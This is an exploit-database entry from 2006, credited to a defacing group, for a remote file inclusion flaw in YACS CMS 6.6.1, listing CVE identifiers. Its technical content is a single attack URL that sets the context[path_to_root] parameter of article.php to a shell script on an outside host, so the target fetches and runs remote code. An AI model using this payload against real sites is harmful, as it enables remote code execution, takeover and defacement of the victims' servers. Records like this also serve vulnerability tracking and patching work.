YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion

Author: MATASANOS
type: webapps
platform: php
port: 
date_added: 2006-08-30 
date_updated:  
verified: 1 
codes: OSVDB-52041;CVE-2006-4559;OSVDB-31310;CVE-2006-4532;OSVDB-31309;OSVDB-31308;OSVDB-31307;OSVDB-31306;OSVDB-31305;OSVDB-31304;OSVDB-31303;OSVDB-31302;OSVDB-31301;OSVDB-28301 
tags: 
aliases:  
screenshot_url:  
application_url: 

##################################### matasanos ###################################
#                    YACS CMS (last version and maybe all) File Inclusion Vulnerability
#
#   affected software: YACS (Yet Another Community System)
#   vendor: yacs . you can donwload it from http://www.yetanothercommunitysystem.com
#   level: Highly Critical (muy critico)
#
#
####################################################################################
#
#
#   http://[target]/[patch]/yacs/articles/article.php?context[path_to_root]=http://url--ataca.org/shell.txt?
#
#
#
####################################################################################
#
#                                 found by MATASANOS
#                               LATIN AMERICAN DEFACERS
#
#
#      recuerdos a antrax,freak,piker,vampi,pennismen,destroy,groxo,vannovax,cvir,mathew

# milw0rm.com [2006-08-31]